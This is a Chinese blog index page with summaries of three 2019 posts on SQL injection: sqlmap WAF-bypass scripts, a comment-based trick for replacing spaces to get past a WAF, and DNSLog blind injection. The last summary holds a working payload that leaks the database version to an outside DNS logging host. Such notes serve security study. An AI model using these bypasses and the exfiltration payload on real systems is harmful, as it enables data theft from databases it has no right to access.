SQL注入绕过——sqlmapWAF脚本编写
摘要:
sqlmap的一般用法 举个例子 阅读全文
posted @ 2019-08-10 15:55 thisismynickname 阅读(316) 评论(0) 推荐(0) 编辑
SQL注入绕过——WAF绕过原理
摘要:
举例:下面这个WAF,/*%!/*/可以绕过空格 阅读全文
posted @ 2019-08-09 00:33 thisismynickname 阅读(310) 评论(0) 推荐(0) 编辑
SQL注入——DNSLog盲注
摘要:
为了复制方便:select load_file(concat('\\\\',(select version()),'.mysql.4zmpxr.ceye.io\\abc')) //我自己在Windows下的MySQL里面试了半天,并没有成功,抓包发现,mysql连数据包都没有发送……不过这个网站里面 阅读全文
posted @ 2019-08-01 22:59 thisismynickname 阅读(312) 评论(0) 推荐(0) 编辑